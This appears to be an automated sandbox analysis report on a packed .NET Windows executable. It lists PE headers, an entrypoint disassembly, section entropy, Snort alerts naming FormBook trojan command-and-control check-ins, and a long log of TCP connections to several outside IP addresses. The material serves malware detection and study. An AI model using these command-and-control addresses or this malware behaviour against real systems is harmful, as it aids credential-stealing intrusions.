                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xA541C5EC [Fri Nov 9 17:05:48 2057 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              xor al, 39h
                                                                                              inc esi
                                                                                              cmp byte ptr [edx], dh
                                                                                              aaa
                                                                                              push edx
                                                                                              xor al, 37h
                                                                                              inc edx
                                                                                              xor al, 37h
                                                                                              dec eax
                                                                                              xor byte ptr [eax+edx*2], dh
                                                                                              xor al, 5Ah
                                                                                              cmp byte ptr [ebx+4Eh], dl
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbbc390x4f.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x620.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb8cc00x70.text
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000xb9cac0xb9e00False0.9153628320443846data7.880750053581327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xbc0000x6200x800False0.333984375data3.449930639463436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xbe0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_VERSION0xbc0900x390data0.41885964912280704
                                                                                              RT_MANIFEST0xbc4300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.2.4185.151.30.13849744802855465 12/03/23-16:26:16.668057TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974480192.168.2.4185.151.30.138
                                                                                              192.168.2.4172.67.184.7349764802855465 12/03/23-16:27:43.947745TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976480192.168.2.4172.67.184.73
                                                                                              192.168.2.437.97.254.2749760802855465 12/03/23-16:27:21.256906TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976080192.168.2.437.97.254.27
                                                                                              192.168.2.4109.68.33.2549748802855465 12/03/23-16:26:38.894529TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974880192.168.2.4109.68.33.25
                                                                                              192.168.2.491.195.240.9449739802855465 12/03/23-16:25:44.407183TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973980192.168.2.491.195.240.94
                                                                                              192.168.2.4202.172.28.20249768802855465 12/03/23-16:28:29.296841TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976880192.168.2.4202.172.28.202
                                                                                              192.168.2.452.68.224.12649756802855465 12/03/23-16:27:06.930079TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975680192.168.2.452.68.224.126
                                                                                              192.168.2.466.29.155.5449752802855465 12/03/23-16:26:52.795950TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975280192.168.2.466.29.155.54

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 3, 2023 16:25:44.216656923 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.406204939 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.406307936 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.407182932 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.637878895 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657303095 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657327890 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657335997 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657345057 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657356024 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657362938 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657370090 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657377005 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657447100 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657460928 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.657593012 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.657613993 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847302914 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847348928 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847366095 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847417116 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847434998 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847459078 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847476006 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847512007 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847527981 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847542048 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847553015 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847558975 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847687960 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.848522902 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:45.037990093 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.693665028 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:08.791899920 CET8049740185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.792071104 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:08.792280912 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:08.891115904 CET8049740185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.891136885 CET8049740185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.891196012 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:10.304064989 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.320837021 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.418893099 CET8049741185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:11.419023037 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.419369936 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.518281937 CET8049741185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:11.518305063 CET8049741185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:11.518573999 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:12.927473068 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:13.943542004 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:14.041928053 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.042093992 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:14.051470041 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:14.149749994 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.149761915 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.149799109 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.150461912 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.150475025 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.150531054 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:15.552490950 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.568552017 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.667722940 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.667840958 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.668056965 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.767751932 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.767774105 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.767791033 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.767966986 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.770114899 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.868199110 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.478981018 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:30.659307003 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.659487009 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:30.659818888 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:30.842624903 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.842659950 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.842679024 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.842796087 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:32.161834955 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.177987099 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.360989094 CET8049746109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:33.361079931 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.361574888 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.548120975 CET8049746109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:33.548136950 CET8049746109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:33.548150063 CET8049746109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:33.548240900 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.548329115 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:34.865075111 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:35.880877018 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:36.062630892 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.062728882 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:36.063855886 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:36.245349884 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245585918 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245599031 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245676994 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245688915 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245735884 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247498035 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247513056 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247523069 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247564077 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:37.567991972 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:38.584002972 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:38.894198895 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:38.894325018 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:38.894529104 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:39.164745092 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:39.164772987 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:39.164786100 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:39.165044069 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:39.165461063 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:39.446849108 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:44.562345028 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:44.735400915 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:44.735589981 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:44.735837936 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:44.906831026 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033732891 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033751965 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033763885 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033777952 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033818960 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:45.033905983 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:45.033993959 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.034045935 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:46.239898920 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.255882978 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.420615911 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.421148062 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.421148062 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.584851980 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689701080 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689726114 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689738035 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689752102 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689789057 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.689821005 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.690017939 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.690150023 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:48.927426100 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:49.943264008 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.106885910 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.107022047 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.107712030 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.271842003 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.271903992 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.271919966 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.271938086 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387907982 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387933016 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387953997 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387972116 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.388062000 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.388072968 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.388098955 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.388113976 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:51.615017891 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.631073952 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.795098066 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:52.795383930 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.795949936 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.959495068 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129287004 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129312992 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129327059 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129342079 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129359007 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129597902 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:53.130192995 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:53.297668934 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.268563986 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.539413929 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.539530039 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.539813042 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.811713934 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811739922 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811755896 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811773062 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811808109 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.811849117 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:00.052367926 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.068357944 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.337385893 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.337506056 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.337733030 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.607656002 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.607826948 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.607875109 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.607891083 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.607909918 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.607952118 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:02.849328995 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:03.865354061 CET4975580192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:04.131256104 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.131417990 CET4975580192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:04.133094072 CET4975580192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:04.399014950 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.399032116 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.399122000 CET4975580192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:04.665132999 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.665920019 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.665935993 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.665949106 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.665966034 CET804975552.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:04.666033030 CET4975580192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:04.666068077 CET4975580192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:05.646156073 CET4975580192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:06.665173054 CET4975680192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:06.929610968 CET804975652.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:06.929888964 CET4975680192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:06.930078983 CET4975680192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:07.195202112 CET804975652.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:07.195293903 CET804975652.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:07.195308924 CET804975652.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:07.195322037 CET804975652.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:07.195343018 CET4975680192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:07.195425987 CET4975680192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:07.459630966 CET804975652.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:07.459877014 CET4975680192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:07.460098982 CET4975680192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:07.724426031 CET804975652.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:12.944041014 CET4975780192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:13.130134106 CET804975737.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:13.130539894 CET4975780192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:13.130539894 CET4975780192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:13.316773891 CET804975737.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:13.317096949 CET4975780192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:14.646126032 CET4975780192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:15.662262917 CET4975880192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:15.846709967 CET804975837.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:15.846878052 CET4975880192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:15.847098112 CET4975880192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:16.031387091 CET804975837.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:16.031508923 CET4975880192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:17.349344015 CET4975880192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:18.365272045 CET4975980192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:18.549695969 CET804975937.97.254.27192.168.2.4
